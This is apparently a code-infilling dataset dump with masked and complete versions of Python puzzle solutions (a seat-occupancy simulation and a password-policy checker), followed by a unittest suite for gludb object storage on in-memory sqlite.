data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\n<mask token>\n\n\ndef is_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n return occupied\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print('')\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n return occupied, found\n\n\ndef is_top_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n return occupied\n\n\ndef is_top_occupied(data, i, j):\n found = False\n occupied = 0\n while j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n j -= 1\n return occupied\n\n\ndef is_top_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n return occupied\n\n\ndef is_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n return occupied\n\n\ndef is_bottom_right_occupied(data, i, j):\n found = False\n occupied = 0\n while i < len(data) and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n return occupied\n\n\ndef is_bottom_occupied(data, i, j):\n found = False\n occupied = 0\n while j < len(data[0]) and not found:\n occupied, found = check_seat(data, i, j)\n j += 1\n return occupied\n\n\ndef is_bottom_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and j < len(data[i]) and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n j += 1\n return occupied\n\n\ndef is_left_occupied(data, i, j):\n found = False\n occupied = 0\n while i >= 0 and not found:\n occupied, found = check_seat(data, i, j)\n i -= 1\n return occupied\n\n\ndef get_occupied_seats(data, i, j):\n occupied_seats = is_top_left_occupied(data, i - 1, j - 1\n ) + is_top_occupied(data, i, j - 1) + is_top_right_occupied(data, i +\n 1, j - 1) + is_right_occupied(data, i + 1, j\n ) + is_bottom_right_occupied(data, i + 1, j + 1) + is_bottom_occupied(\n data, i, j + 1) + is_bottom_left_occupied(data, i - 1, j + 1\n ) + is_left_occupied(data, i - 1, j)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == '#':\n seats += 1\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n end = False\n round = 1\n while not end:\n for i in range(0, len(data)):\n for j in range(0, len(data[i])):\n if data[i][j] == 'L' and get_occupied_seats(data, i, j) == 0:\n data_next[i][j] = '#'\n elif data[i][j] == '#' and get_occupied_seats(data, i, j) >= 5:\n data_next[i][j] = 'L'\n print('Round %d' % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\n\n\ndef show_data(data):\n for line in data:\n print(''.join(line))\n print(\"\")\n\n\ndef check_seat(data, i, j):\n if data[i][j] == '#':\n occupied = 1\n found = True\n elif data[i][j] == 'L':\n occupied = 0\n found = True\n else:\n occupied = 0\n found = False\n\n return occupied, found\n\n\ndef is_top_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n j -= 1\n\n return occupied\n\n\ndef is_top_occupied(data,i,j):\n found = False\n occupied = 0\n while (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n j -= 1\n\n return occupied\n\n\ndef is_top_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (j >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n j -= 1\n\n return occupied\n\n\ndef is_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n\n return occupied\n\n\ndef is_bottom_right_occupied(data,i,j):\n found = False\n occupied = 0\n while (i < len(data)) and (j < len(data[i])) and (not found):\n occupied, found = check_seat(data, i, j)\n i += 1\n j += 1\n\n return occupied\n\n\ndef is_bottom_occupied(data,i,j):\n found = False\n occupied = 0\n while (j < len(data[0])) and (not found):\n occupied, found = check_seat(data, i, j)\n j += 1\n\n return occupied\n\n\ndef is_bottom_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (j < len(data[i])) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n j += 1\n\n return occupied\n\n\ndef is_left_occupied(data,i,j):\n found = False\n occupied = 0\n while (i >= 0) and (not found):\n occupied, found = check_seat(data, i, j)\n i -= 1\n\n return occupied\n\n\ndef get_occupied_seats(data,i,j):\n occupied_seats = ( is_top_left_occupied(data, i-1, j-1) +\n is_top_occupied(data, i, j-1) +\n is_top_right_occupied(data, i+1, j-1) +\n is_right_occupied(data, i+1, j) +\n is_bottom_right_occupied(data, i+1, j+1) +\n is_bottom_occupied(data, i, j+1) +\n is_bottom_left_occupied(data, i-1, j+1) +\n is_left_occupied(data, i-1, j) )\n\n # print(occupied_seats)\n return occupied_seats\n\n\ndef count_seats(data):\n seats = 0\n for line in data:\n for x in line:\n if x == \"#\": seats += 1\n\n return seats\n\n\ndef main():\n with open('input.txt') as f:\n lines = f.readlines()\n\n data = [[char for char in line[:-1]] for line in lines]\n data_next = [['.' for char in line[:-1]] for line in lines]\n\n end = False\n round = 1\n while not end:\n for i in range(0,len(data)):\n for j in range(0,len(data[i])):\n if (data[i][j] == 'L') and (get_occupied_seats(data,i,j) == 0):\n data_next[i][j] = '#'\n elif (data[i][j] == '#') and (get_occupied_seats(data,i,j) >= 5):\n data_next[i][j] = 'L'\n\n print (\"Round %d\" % round)\n round += 1\n if data == data_next:\n seats = count_seats(data)\n print(seats)\n end = True\n else:\n data = [x[:] for x in data_next]\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
5,
10,
11,
14,
16
]
}
|
[
5,
10,
11,
14,
16
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('input.txt', 'r') as f:
lines = f.read()
<|reserved_special_token_0|>
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open('input.txt', 'r') as f:
lines = f.read()
lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]
valid = 0
new_valid = 0
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
<|reserved_special_token_1|>
"""
Day 2
"""
with open('input.txt', 'r') as f:
lines = f.read()
lines = lines.split('\n')[:-1]
lines = [l.split(' ') for l in lines]
valid = 0
new_valid = 0
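# Policy 1: the letter's count must lie within the given min-max range.
# Policy 2: exactly one of the two 1-based positions may hold the letter.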
for cur_pw in lines:
letter = cur_pw[1].strip(':')
amount = cur_pw[2].count(letter)
rule = cur_pw[0].split('-')
rule = [int(r) for r in rule]
if amount >= rule[0] and amount <= rule[1]:
valid += 1
occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]
if occurences.count(letter) == 1:
new_valid += 1
print(valid)
print(new_valid)
|
flexible
|
{
"blob_id": "46a3c3777d90976c7d39772d2e94430506d3acd7",
"index": 8025,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwith open('input.txt', 'r') as f:\n lines = f.read()\n<mask token>\nfor cur_pw in lines:\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\nprint(valid)\nprint(new_valid)\n",
"step-3": "<mask token>\nwith open('input.txt', 'r') as f:\n lines = f.read()\nlines = lines.split('\\n')[:-1]\nlines = [l.split(' ') for l in lines]\nvalid = 0\nnew_valid = 0\nfor cur_pw in lines:\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\nprint(valid)\nprint(new_valid)\n",
"step-4": "\"\"\"\nDay 2\n\"\"\"\n\nwith open('input.txt', 'r') as f:\n lines = f.read()\n\nlines = lines.split('\\n')[:-1]\nlines = [l.split(' ') for l in lines]\n\nvalid = 0\nnew_valid = 0\nfor cur_pw in lines:\n\n letter = cur_pw[1].strip(':')\n amount = cur_pw[2].count(letter)\n rule = cur_pw[0].split('-')\n rule = [int(r) for r in rule]\n\n if amount >= rule[0] and amount <= rule[1]:\n valid += 1\n\n occurences = cur_pw[2][rule[0] - 1] + cur_pw[2][rule[1] - 1]\n if occurences.count(letter) == 1:\n new_valid += 1\n\nprint(valid)\nprint(new_valid)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
"""Testing data storage functionality in gludb.simple (see simple_tests.py for
testing of the rest of gludb.simple functionality)"""
import unittest
import datetime
import time
import gludb.config
from gludb.versioning import VersioningTypes
from gludb.data import orig_version
from gludb.simple import DBObject, Field
from gludb.utils import parse_now_field
from utils import compare_data_objects
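# Model under test: a DBObject stored without versioning, mixing defaulted
# scalar fields with a dict field for the save/find round-trip tests below.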
@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)
class SimpleStorage(object):
name = Field('default name')
descrip = Field()
age = Field(42)
extra_data = Field(dict)
# Same tests as DefaultStorageTesting but with different setUp/tearDown
class MissingMapTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(None) # no default database
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def test_failedops(self):
def try_op():
return gludb.config.get_mapping(SimpleStorage)
self.assertRaises(ValueError, try_op)
def test_justnomap(self):
mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)
self.assertIsNone(mapped)
class DefaultStorageTesting(unittest.TestCase):
def setUp(self):
gludb.config.default_database(gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
def assertObjEq(self, obj1, obj2):
self.assertTrue(compare_data_objects(obj1, obj2))
def assertReadable(self, obj):
read_back = obj.__class__.find_one(obj.id)
self.assertObjEq(obj, read_back)
orig_ver = obj.__class__.from_data(orig_version(read_back))
self.assertObjEq(obj, orig_ver)
def assertCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) < eps)
def assertNotCloseTimes(self, d1, d2, eps=0.15):
self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)
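    # The 0.15 s epsilon tolerates clock jitter while still telling apart
    # the two saves spaced 0.3 s apart in test_extra_fields.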
def test_missing(self):
self.assertIsNone(SimpleStorage.find_one('not there'))
def test_table_has_prefix(self):
self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.__table_name__)
def test_extra_fields(self):
s = SimpleStorage(name='TimeTracking', descrip='FirstSave')
s.save()
create1 = parse_now_field(s._create_date)
update1 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update1)
self.assertCloseTimes(create1, update1)
# Sucks, but we need to space out our timestamps
time.sleep(0.3)
s.descrip = 'SecondSave'
s.save()
create2 = parse_now_field(s._create_date)
update2 = parse_now_field(s._last_update)
self.assertCloseTimes(datetime.datetime.utcnow(), update2)
self.assertCloseTimes(create1, create2)
self.assertNotCloseTimes(update1, update2)
s2 = SimpleStorage.find_one(s.id)
create3 = parse_now_field(s2._create_date)
update3 = parse_now_field(s2._last_update)
# Note that we DON'T check for string equality - that's because
# _last_update is updated every time the instance method to_data is
# called. See simple.md for extra details on auto fields
self.assertCloseTimes(create2, create3)
self.assertCloseTimes(update2, update3)
def test_readwrite(self):
s = SimpleStorage(name='Pre', descrip='Testing', age=-1)
self.assertEquals('', s.id)
self.assertEquals('Pre', s.name)
self.assertEquals('Testing', s.descrip)
self.assertEquals(-1, s.age)
self.assertEquals({}, s.extra_data)
s.extra_data['coolness'] = {'a': 123, 'b': 456}
s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]
s.extra_data['oscar'] = 'grouch'
s.extra_data['fp'] = 42.42
self.assertTrue(orig_version(s) is None)
s.save()
self.assertTrue(len(s.id) > 0)
self.assertReadable(s)
# Saved - so should have a prev version that is identical
self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))
s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)
s2.save()
self.assertReadable(s2)
all_recs = SimpleStorage.find_all()
self.assertEqual(1, len(all_recs))
self.assertObjEq(s2, all_recs[0])
        # Change the object we read and then ensure that the previous version
# saved on load is correct
read_obj = all_recs[0]
read_obj.name = 'Pre2'
read_obj.descrip = 'Testing2'
read_obj.age = -2
s0 = SimpleStorage.from_data(orig_version(read_obj))
self.assertEquals(s.id, s0.id)
self.assertEquals('Post', s0.name)
self.assertEquals('AtItAgain', s0.descrip)
self.assertEquals(256, s0.age)
self.assertEquals({}, s0.extra_data)
# Same tests as DefaultStorageTesting but with different setUp/tearDown
class SpecificStorageTesting(DefaultStorageTesting):
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
# Same tests as DefaultStorageTesting but with different setUp/tearDown
class PrefixedStorageTesting(DefaultStorageTesting):
PREFIX = "Prefix"
def setUp(self):
gludb.config.default_database(None) # no default database
gludb.config.class_database(SimpleStorage, gludb.config.Database(
'sqlite',
filename=':memory:'
))
gludb.config.set_db_application_prefix(self.PREFIX)
SimpleStorage.ensure_table()
def tearDown(self):
# Undo any database setup
gludb.config.clear_database_config()
gludb.config.set_db_application_prefix(None)
def test_table_has_prefix(self):
expectedName = self.PREFIX + gludb.config._APPLICATION_SEP + SimpleStorage.__table_name__
self.assertEqual(SimpleStorage.get_table_name(), expectedName)
|
normal
|
{
"blob_id": "7383ae97d6a1368896d05d0cafc9846c24004701",
"index": 2690,
"step-1": "<mask token>\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n <mask token>\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n <mask token>\n <mask token>\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-2": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass 
PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-3": "<mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n s.save()\n create2 = parse_now_field(s._create_date)\n update2 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update2)\n self.assertCloseTimes(create1, create2)\n self.assertNotCloseTimes(update1, update2)\n s2 = SimpleStorage.find_one(s.id)\n create3 = parse_now_field(s2._create_date)\n update3 = parse_now_field(s2._last_update)\n self.assertCloseTimes(create2, create3)\n self.assertCloseTimes(update2, update3)\n\n def test_readwrite(self):\n s = SimpleStorage(name='Pre', descrip='Testing', age=-1)\n self.assertEquals('', s.id)\n self.assertEquals('Pre', s.name)\n self.assertEquals('Testing', s.descrip)\n self.assertEquals(-1, s.age)\n self.assertEquals({}, s.extra_data)\n s.extra_data['coolness'] = {'a': 123, 'b': 456}\n s.extra_data['list-thing'] = [1, 2, 3, 4, 5, 6]\n s.extra_data['oscar'] = 'grouch'\n s.extra_data['fp'] = 42.42\n self.assertTrue(orig_version(s) is None)\n s.save()\n self.assertTrue(len(s.id) > 0)\n self.assertReadable(s)\n self.assertObjEq(s, SimpleStorage.from_data(orig_version(s)))\n s2 = SimpleStorage(id=s.id, name='Post', descrip='AtItAgain', age=256)\n s2.save()\n self.assertReadable(s2)\n all_recs = SimpleStorage.find_all()\n self.assertEqual(1, len(all_recs))\n self.assertObjEq(s2, all_recs[0])\n read_obj = all_recs[0]\n read_obj.name = 'Pre2'\n read_obj.descrip = 'Testing2'\n read_obj.age = -2\n s0 = SimpleStorage.from_data(orig_version(read_obj))\n self.assertEquals(s.id, s0.id)\n self.assertEquals('Post', s0.name)\n self.assertEquals('AtItAgain', s0.descrip)\n self.assertEquals(256, s0.age)\n self.assertEquals({}, s0.extra_data)\n\n\nclass SpecificStorageTesting(DefaultStorageTesting):\n\n def setUp(self):\n gludb.config.default_database(None)\n 
gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n\nclass PrefixedStorageTesting(DefaultStorageTesting):\n PREFIX = 'Prefix'\n\n def setUp(self):\n gludb.config.default_database(None)\n gludb.config.class_database(SimpleStorage, gludb.config.Database(\n 'sqlite', filename=':memory:'))\n gludb.config.set_db_application_prefix(self.PREFIX)\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n gludb.config.set_db_application_prefix(None)\n\n def test_table_has_prefix(self):\n expectedName = (self.PREFIX + gludb.config._APPLICATION_SEP +\n SimpleStorage.__table_name__)\n self.assertEqual(SimpleStorage.get_table_name(), expectedName)\n",
"step-4": "<mask token>\n\n\n@DBObject(table_name='SimpleStorageTest', versioning=VersioningTypes.NONE)\nclass SimpleStorage(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass MissingMapTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(None)\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def test_failedops(self):\n\n def try_op():\n return gludb.config.get_mapping(SimpleStorage)\n self.assertRaises(ValueError, try_op)\n\n def test_justnomap(self):\n mapped = gludb.config.get_mapping(SimpleStorage, no_mapping_ok=True)\n self.assertIsNone(mapped)\n\n\nclass DefaultStorageTesting(unittest.TestCase):\n\n def setUp(self):\n gludb.config.default_database(gludb.config.Database('sqlite',\n filename=':memory:'))\n SimpleStorage.ensure_table()\n\n def tearDown(self):\n gludb.config.clear_database_config()\n\n def assertObjEq(self, obj1, obj2):\n self.assertTrue(compare_data_objects(obj1, obj2))\n\n def assertReadable(self, obj):\n read_back = obj.__class__.find_one(obj.id)\n self.assertObjEq(obj, read_back)\n orig_ver = obj.__class__.from_data(orig_version(read_back))\n self.assertObjEq(obj, orig_ver)\n\n def assertCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) < eps)\n\n def assertNotCloseTimes(self, d1, d2, eps=0.15):\n self.assertTrue(abs((d1 - d2).total_seconds()) >= eps)\n\n def test_missing(self):\n self.assertIsNone(SimpleStorage.find_one('not there'))\n\n def test_table_has_prefix(self):\n self.assertEqual(SimpleStorage.get_table_name(), SimpleStorage.\n __table_name__)\n\n def test_extra_fields(self):\n s = SimpleStorage(name='TimeTracking', descrip='FirstSave')\n s.save()\n create1 = parse_now_field(s._create_date)\n update1 = parse_now_field(s._last_update)\n self.assertCloseTimes(datetime.datetime.utcnow(), update1)\n self.assertCloseTimes(create1, update1)\n time.sleep(0.3)\n s.descrip = 'SecondSave'\n 